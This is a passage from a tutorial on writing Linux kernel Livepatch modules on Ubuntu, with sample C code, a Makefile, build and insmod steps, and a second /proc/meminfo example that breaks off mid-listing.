<h2 id="what-consistency-model-does-ubuntu-use">What Consistency Model Does Ubuntu Use?</h2>
<p>Ubuntu uses the Livepatch (mainline) consistency model, which has the best of
both kpatch and kGraft. All code is the same as what is shipped in the mainline
kernel, and there are no custom changes.</p>
<h1 id="writing-our-own-livepatches">Writing our Own Livepatches</h1>
<p>Now that we have learned a bit about what Livepatch is, how it works, and the
careful consideration that goes into selecting a consistency model, let’s
start making some Livepatches of our own.</p>
<h2 id="structure-of-a-livepatch">Structure of a Livepatch</h2>
<p>For our first Livepatch, I think we will follow the sample which is provided in
the mainline kernel. Download a copy of <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/samples/livepatch/livepatch-sample.c">livepatch-sample.c</a>
and have a read.</p>
<p>Note, the Livepatch API has changed over time, so if you want to build for 4.4
Xenial, use the <code class="language-plaintext highlighter-rouge">livepatch-sample.c</code> from the Xenial kernel sources. If you
get an error <code class="language-plaintext highlighter-rouge">insmod: ERROR: could not insert module livepatch-sample.ko: Invalid parameters</code>
then you are using the wrong Livepatch API.</p>
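<p>For comparison, the older two step API registered and enabled the patch separately. From memory, the init and exit functions on a 4.4 era kernel look roughly like this, but do check the <code class="language-plaintext highlighter-rouge">livepatch-sample.c</code> in your kernel sources for the exact form:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Rough sketch of the older register-then-enable Livepatch API -- verify
 * against the livepatch-sample.c shipped with your kernel. */
static int livepatch_init(void)
{
	int ret;

	ret = klp_register_patch(&patch);
	if (ret)
		return ret;

	ret = klp_enable_patch(&patch);
	if (ret) {
		WARN_ON(klp_unregister_patch(&patch));
		return ret;
	}

	return 0;
}

static void livepatch_exit(void)
{
	WARN_ON(klp_disable_patch(&patch));
	WARN_ON(klp_unregister_patch(&patch));
}
</code></pre></div></div>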
<p>I am going to explain the latest API, as found in 5.4 Focal.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>
</span>
<span class="cp">#include <linux/seq_file.h>
</span><span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_cmdline_proc_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="s">"this has been live patched"</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_func</span> <span class="n">funcs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="p">.</span><span class="n">old_name</span> <span class="o">=</span> <span class="s">"cmdline_proc_show"</span><span class="p">,</span>
<span class="p">.</span><span class="n">new_func</span> <span class="o">=</span> <span class="n">livepatch_cmdline_proc_show</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_object</span> <span class="n">objs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="cm">/* name being NULL means vmlinux */</span>
<span class="p">.</span><span class="n">funcs</span> <span class="o">=</span> <span class="n">funcs</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_patch</span> <span class="n">patch</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">mod</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">objs</span> <span class="o">=</span> <span class="n">objs</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">klp_enable_patch</span><span class="p">(</span><span class="o">&</span><span class="n">patch</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">livepatch_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">livepatch_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">livepatch_exit</span><span class="p">);</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">MODULE_INFO</span><span class="p">(</span><span class="n">livepatch</span><span class="p">,</span> <span class="s">"Y"</span><span class="p">);</span>
</code></pre></div></div>
<p>As you can already see, since the Livepatch is a kernel module, it follows the
same process required when writing a kernel module. We <code class="language-plaintext highlighter-rouge">#include</code> the kernel
module header files of <code class="language-plaintext highlighter-rouge">linux/module.h</code> and <code class="language-plaintext highlighter-rouge">linux/kernel.h</code>, and declare our
<code class="language-plaintext highlighter-rouge">module_init()</code> and <code class="language-plaintext highlighter-rouge">module_exit()</code> function pointers.</p>
<p>To say we are making a Livepatch, we also include <code class="language-plaintext highlighter-rouge">linux/livepatch.h</code>, set
the module info macro to <code class="language-plaintext highlighter-rouge">livepatch, Y</code> and have the module init function call
<code class="language-plaintext highlighter-rouge">klp_enable_patch()</code>, the entry point to the Livepatch subsystem.</p>
<p>Declaring the Livepatch itself is pretty simple. In this example, we will
patch <code class="language-plaintext highlighter-rouge">cmdline_proc_show()</code>, the function which returns the kernel command line
when you read from <code class="language-plaintext highlighter-rouge">/proc/cmdline</code>.</p>
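<p>For reference, the original function in <code class="language-plaintext highlighter-rouge">fs/proc/cmdline.c</code> is tiny. It looks roughly like this, though the exact form varies between kernel versions:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Roughly what fs/proc/cmdline.c contains -- check your own kernel sources
 * for the exact version. */
static int cmdline_proc_show(struct seq_file *m, void *v)
{
	seq_printf(m, "%s\n", saved_command_line);
	return 0;
}
</code></pre></div></div>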
<p>We define a new function, <code class="language-plaintext highlighter-rouge">livepatch_cmdline_proc_show()</code>, and give the “fixed”
implementation. We then map the new function to the old function by defining
a struct of type <code class="language-plaintext highlighter-rouge">klp_func</code>, in this case called <code class="language-plaintext highlighter-rouge">funcs[]</code>, and filling in the
members <code class="language-plaintext highlighter-rouge">.old_name</code> and <code class="language-plaintext highlighter-rouge">.new_func</code>.</p>
<p>Since we might need to replace more than one function in our Livepatch, we can
create many of these function mappings, as <code class="language-plaintext highlighter-rouge">funcs[]</code> is an array, as shown below.</p>
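<p>For example, a hypothetical Livepatch that also replaced <code class="language-plaintext highlighter-rouge">version_proc_show()</code> would simply add another entry. The second <code class="language-plaintext highlighter-rouge">new_func</code> here is a made up name for illustration:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Hypothetical example: one Livepatch module replacing two functions.
 * livepatch_version_proc_show() is an illustrative name, not real code. */
static struct klp_func funcs[] = {
	{
		.old_name = "cmdline_proc_show",
		.new_func = livepatch_cmdline_proc_show,
	},
	{
		.old_name = "version_proc_show",
		.new_func = livepatch_version_proc_show,
	},
	{ }	/* terminating empty entry */
};
</code></pre></div></div>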
<p>We then tell Livepatch what to patch with struct <code class="language-plaintext highlighter-rouge">klp_object</code>. We set <code class="language-plaintext highlighter-rouge">.funcs</code>
to our array of functions, and set <code class="language-plaintext highlighter-rouge">.name</code> to the name of the kernel module which
contains the functions being patched, or simply <code class="language-plaintext highlighter-rouge">NULL</code> if we want to target <code class="language-plaintext highlighter-rouge">vmlinux</code>.</p>
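<p>If the functions we wanted to patch lived in a module instead, say ext4, the object would be declared along these lines. This is just a sketch, and <code class="language-plaintext highlighter-rouge">ext4_funcs</code> is a hypothetical <code class="language-plaintext highlighter-rouge">klp_func</code> array:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Hypothetical example: patching functions that live in the ext4 module
 * rather than in vmlinux. */
static struct klp_object objs[] = {
	{
		.name = "ext4",		/* kernel module that owns the functions */
		.funcs = ext4_funcs,	/* hypothetical klp_func array */
	},
	{ }	/* terminating empty entry */
};
</code></pre></div></div>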
<p>Finally, this is wrapped into a struct <code class="language-plaintext highlighter-rouge">klp_patch</code>, where we declare the module
name, and the object struct. This is the struct we pass a reference to when
<code class="language-plaintext highlighter-rouge">klp_enable_patch()</code> is called.</p>
<p>We can build the module with the following <code class="language-plaintext highlighter-rouge">Makefile</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := livepatch-sample.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
	$(MAKE) -C $(KDIR) M=$(PWD) clean
</code></pre></div></div>
<p>You need to install a compiler, and the kernel headers for your running kernel:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>apt <span class="nb">install </span>linux-headers-<span class="sb">`</span><span class="nb">uname</span> <span class="nt">-r</span><span class="sb">`</span>
<span class="nv">$ </span><span class="nb">sudo </span>apt <span class="nb">install </span>build-essential
</code></pre></div></div>
<p>Then go ahead and run <code class="language-plaintext highlighter-rouge">make</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/simple modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.o
Building modules, stage 2.
MODPOST 1 modules
CC <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.mod.o
LD <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.ko
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
</code></pre></div></div>
<p>I did this on Focal, but this should work on any Ubuntu kernel from 4.4 Xenial
and upward, as they all have Livepatch enabled.</p>
<p>We then have the end result, <code class="language-plaintext highlighter-rouge">livepatch-sample.ko</code>. Let’s do a before and after
read of <code class="language-plaintext highlighter-rouge">/proc/cmdline</code> as we load the module:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/cmdline
<span class="nv">BOOT_IMAGE</span><span class="o">=</span>/boot/vmlinuz-5.4.0-21-generic <span class="nv">root</span><span class="o">=</span><span class="nv">UUID</span><span class="o">=</span>f9f909c3-782a-43c2-a59d-c789656b4188 ro
<span class="nv">$ </span><span class="nb">sudo </span>insmod livepatch-sample.ko
<span class="nv">$ </span><span class="nb">cat</span> /proc/cmdline
this has been live patched
</code></pre></div></div>
<p>How cool is that? We have successfully Livepatched our system. Checking <code class="language-plaintext highlighter-rouge">dmesg</code> shows
us the progress of Livepatch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 33.100762] livepatch_sample: loading out-of-tree module taints kernel.
[ 33.100764] livepatch_sample: tainting kernel with TAINT_LIVEPATCH
[ 33.100793] livepatch_sample: module verification failed: signature and/or required key missing - tainting kernel
[ 33.111720] livepatch: enabling patch 'livepatch_sample'
[ 33.114679] livepatch: 'livepatch_sample': starting patching transition
[ 33.883586] livepatch: 'livepatch_sample': patching complete
</code></pre></div></div>
<p>Note, we didn’t sign our kernel module, which is why module verification failed.
This is only really important if you are using Secure Boot. We can also see that our
kernel gained taint flags for loading the Livepatch module.</p>
<h2 id="making-a-slightly-more-complex-livepatch">Making a Slightly More Complex Livepatch</h2>
<p>The previous Livepatch example used a completely new basic function to write
back a replaced kernel command line. What happens if we want to actually patch
existing code?</p>
<p>The next example will work towards using kpatch-build, following the
primary example in the <a href="https://github.com/dynup/kpatch">kpatch repository</a>.</p>
<p>What we want to do is change how the text is displayed for <code class="language-plaintext highlighter-rouge">VmallocChunk</code> in
<code class="language-plaintext highlighter-rouge">/proc/meminfo</code>. The following patch for Linux 5.4 makes it capitalised:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
seq_printf(m, "VmallocTotal: %8lu kB\n",
(unsigned long)VMALLOC_TOTAL >> 10);
show_val_kb(m, "VmallocUsed: ", vmalloc_nr_pages());
- show_val_kb(m, "VmallocChunk: ", 0ul);
+ show_val_kb(m, "VMALLOCCHUNK: ", 0ul);
show_val_kb(m, "Percpu: ", pcpu_nr_pages());
#ifdef CONFIG_MEMORY_FAILURE
</code></pre></div></div>
<h3 id="writing-the-livepatch-ourselves">Writing the Livepatch Ourselves</h3>
<p>Okay, let’s follow a similar format to last time. Let’s copy the new function
into our Livepatch template, like so:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_meminfo_proc_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">sysinfo</span> <span class="n">i</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">committed</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">cached</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">available</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pages</span><span class="p">[</span><span class="n">NR_LRU_LISTS</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">sreclaimable</span><span class="p">,</span> <span class="n">sunreclaim</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">lru</span><span class="p">;</span>
<span class="n">si_meminfo</span><span class="p">(</span><span class="o">&</span><span class="n">i</span><span class="p">);</span>
<span class="n">si_swapinfo</span><span class="p">(</span><span class="o">&</span><span class="n">i</span><span class="p">);</span>
<span class="n">committed</span> <span class="o">=</span> <span class="n">percpu_counter_read_positive</span><span class="p">(</span><span class="o">&</span><span class="n">vm_committed_as</span><span class="p">);</span>
<span class="n">cached</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_PAGES</span><span class="p">)</span> <span class="o">-</span>
<span class="n">total_swapcache_pages</span><span class="p">()</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">bufferram</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">cached</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">cached</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">lru</span> <span class="o">=</span> <span class="n">LRU_BASE</span><span class="p">;</span> <span class="n">lru</span> <span class="o"><</span> <span class="n">NR_LRU_LISTS</span><span class="p">;</span> <span class="n">lru</span><span class="o">++</span><span class="p">)</span>
<span class="n">pages</span><span class="p">[</span><span class="n">lru</span><span class="p">]</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_LRU_BASE</span> <span class="o">+</span> <span class="n">lru</span><span class="p">);</span>
<span class="n">available</span> <span class="o">=</span> <span class="n">si_mem_available</span><span class="p">();</span>
<span class="n">sreclaimable</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SLAB_RECLAIMABLE</span><span class="p">);</span>
<span class="n">sunreclaim</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SLAB_UNRECLAIMABLE</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemAvailable: "</span><span class="p">,</span> <span class="n">available</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Buffers: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">bufferram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Cached: "</span><span class="p">,</span> <span class="n">cached</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapCached: "</span><span class="p">,</span> <span class="n">total_swapcache_pages</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_ANON</span><span class="p">]</span> <span class="o">+</span>
<span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_ANON</span><span class="p">]</span> <span class="o">+</span>
<span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active(anon): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_ANON</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive(anon): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_ANON</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active(file): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive(file): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Unevictable: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_UNEVICTABLE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Mlocked: "</span><span class="p">,</span> <span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_MLOCK</span><span class="p">));</span>
<span class="cp">#ifdef CONFIG_HIGHMEM
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HighTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalhigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HighFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freehigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"LowTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalram</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">totalhigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"LowFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeram</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">freehigh</span><span class="p">);</span>
<span class="cp">#endif
</span>
<span class="cp">#ifndef CONFIG_MMU
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MmapCopy: "</span><span class="p">,</span>
<span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">atomic_long_read</span><span class="p">(</span><span class="o">&</span><span class="n">mmap_pages_allocated</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalswap</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeswap</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Dirty: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_DIRTY</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Writeback: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_WRITEBACK</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"AnonPages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_ANON_MAPPED</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Mapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_MAPPED</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Shmem: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">sharedram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"KReclaimable: "</span><span class="p">,</span> <span class="n">sreclaimable</span> <span class="o">+</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_KERNEL_MISC_RECLAIMABLE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Slab: "</span><span class="p">,</span> <span class="n">sreclaimable</span> <span class="o">+</span> <span class="n">sunreclaim</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SReclaimable: "</span><span class="p">,</span> <span class="n">sreclaimable</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SUnreclaim: "</span><span class="p">,</span> <span class="n">sunreclaim</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"KernelStack: %8lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_KERNEL_STACK_KB</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"PageTables: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_PAGETABLE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"NFS_Unstable: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_UNSTABLE_NFS</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Bounce: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_BOUNCE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"WritebackTmp: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_WRITEBACK_TEMP</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CommitLimit: "</span><span class="p">,</span> <span class="n">vm_commit_limit</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Committed_AS: "</span><span class="p">,</span> <span class="n">committed</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VmallocTotal: %8lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">VMALLOC_TOTAL</span> <span class="o">>></span> <span class="mi">10</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VmallocUsed: "</span><span class="p">,</span> <span class="n">vmalloc_nr_pages</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VMALLOCCHUNK: "</span><span class="p">,</span> <span class="mi">0ul</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Percpu: "</span><span class="p">,</span> <span class="n">pcpu_nr_pages</span><span class="p">());</span>
<span class="cp">#ifdef CONFIG_MEMORY_FAILURE
</span> <span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HardwareCorrupted: %5lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">atomic_long_read</span><span class="p">(</span><span class="o">&</span><span class="n">num_poisoned_pages</span><span class="p">)</span> <span class="o"><<</span> <span class="p">(</span><span class="n">PAGE_SHIFT</span> <span class="o">-</span> <span class="mi">10</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="cp">#ifdef CONFIG_TRANSPARENT_HUGEPAGE
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"AnonHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_ANON_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"ShmemHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SHMEM_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"ShmemPmdMapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SHMEM_PMDMAPPED</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"FileHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"FilePmdMapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_PMDMAPPED</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="cp">#endif
</span>
<span class="cp">#ifdef CONFIG_CMA
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CmaTotal: "</span><span class="p">,</span> <span class="n">totalcma_pages</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CmaFree: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_FREE_CMA_PAGES</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="n">hugetlb_report_meminfo</span><span class="p">(</span><span class="n">m</span><span class="p">);</span>
<span class="n">arch_report_meminfo</span><span class="p">(</span><span class="n">m</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_func</span> <span class="n">funcs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
